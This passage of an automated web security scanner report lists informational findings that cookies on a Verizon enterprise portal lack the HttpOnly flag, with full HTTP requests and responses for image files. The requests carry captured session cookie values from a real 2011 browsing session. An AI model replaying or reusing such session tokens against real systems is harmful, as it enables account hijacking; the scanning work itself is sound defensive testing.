pref_lang=en-US; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 63
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "3f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a...............................!.......,............!4    .;

10.56. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 446
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1be-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7167
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

10.57. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 445
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1bd-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7187
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

10.58. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 336
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "150-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
..........................................................................................................HH.HH.OO.OO............................................................................
...[SNIP]...

10.59. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
....................................................................................................((.==.FF.HH................................................................................
...[SNIP]...

10.60. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "2b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7193
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a.............!.......,...........D..;

10.61. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 634
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "27a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7145
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.........................................................................................................................................................................vvvnnnmmmllljjjiiiYYYX
...[SNIP]...

10.62. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_errorMssg.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 546
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "222-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:17 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

GIF89a.....G............O.....................................
...d.4...+.............$............(.FR..|....zx....#....................................s..^..c..........................t.............
...[SNIP]...

10.63. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_video.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 410
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "19a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.............................................................................................................................................................vvvuuurrrllleeeddd...................
...[SNIP]...

10.64. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/s.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: "2b-4e228b00"
Accept-Ranges: bytes
Cache-Control: private, max-age=7184
